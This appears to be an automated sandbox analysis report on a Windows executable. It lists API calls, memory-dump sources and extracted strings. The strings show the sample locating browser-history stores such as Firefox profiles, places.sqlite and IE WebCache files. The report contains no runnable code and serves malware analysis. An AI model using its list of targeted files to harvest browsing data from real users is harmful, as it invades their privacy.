                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0041249C
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004124D2
                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ??2@HandleIconLoadModulememset
                                                                                • String ID: r!A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                • memset.MSVCRT ref: 00414C87
                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                Strings
                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                • API String ID: 71295984-2036018995
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                • String ID: "%s"
                                                                                • API String ID: 1343145685-3297466227
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                • API String ID: 1714573020-3385500049
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$no such vfs: %s
                                                                                • API String ID: 3510742995-3177411277
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: @ $SQLite format 3
                                                                                • API String ID: 1475443563-3708268960
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: _wcsicmpqsort
                                                                                • String ID: /nosort$/sort
                                                                                • API String ID: 1579243037-1578091866
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                • memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                Strings
                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                • API String ID: 2887208581-2114579845
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                • API String ID: 2221118986-1725073988
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: PrivateProfileString$Write
                                                                                • String ID: "%s"
                                                                                • API String ID: 2948465352-3297466227
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotificationSleep
                                                                                • String ID: }A
                                                                                • API String ID: 1821831730-2138825249
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@DeleteObject
                                                                                • String ID: r!A
                                                                                • API String ID: 1103273653-628097481
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??2@
                                                                                • String ID:
                                                                                • API String ID: 1033339047-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                • memcmp.MSVCRT ref: 00444BA5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$memcmp
                                                                                • String ID: $$8
                                                                                • API String ID: 2808797137-435121686
                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                • too many columns on %s, xrefs: 00430763
                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                • API String ID: 0-1445880494
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                  • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                                • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                                • String ID:
                                                                                • API String ID: 2722907921-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000000,?,?,000000FF), ref: 0040E582
                                                                                • DeleteFileW.KERNEL32(?,?,?,000000FF), ref: 0040E5A3
                                                                                • CloseHandle.KERNEL32(000000FF,?,?,000000FF), ref: 0040E5CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CloseHandle$DeleteFile
                                                                                • String ID:
                                                                                • API String ID: 2471952376-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                                                                • String ID:
                                                                                • API String ID: 2947809556-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                • memset.MSVCRT ref: 00403A55
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                                • String ID: history.dat$places.sqlite
                                                                                • API String ID: 3093078384-467022611
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B1D1: wcslen.MSVCRT ref: 0040B1DE
                                                                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                                                  • Part of subcall function 0040B1D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                                                  • Part of subcall function 0040B1D1: memcpy.MSVCRT ref: 0040B248
                                                                                • memset.MSVCRT ref: 0040B32F
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0040B432,000000FF,?,00000FFF,00000000,00000000,0040B432,00000000,-00000002,0040B626,00000000), ref: 0040B348
                                                                                  • Part of subcall function 0040B0D1: strlen.MSVCRT ref: 0040B0D8
                                                                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                                                  • Part of subcall function 0040B0D1: ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                                                  • Part of subcall function 0040B0D1: memcpy.MSVCRT ref: 0040B159
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040B36F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??3@$memcpy$ByteCharMultiWidememsetstrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 1562205978-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                • String ID:
                                                                                • API String ID: 839530781-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: FileFindFirst
                                                                                • String ID: *.*$index.dat
                                                                                • API String ID: 1974802433-2863569691
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp Download File
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ??3@mallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 3831604043-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: d
                                                                                • API String ID: 0-2564639436
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: BINARY
                                                                                • API String ID: 2221118986-907554435
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                • String ID:
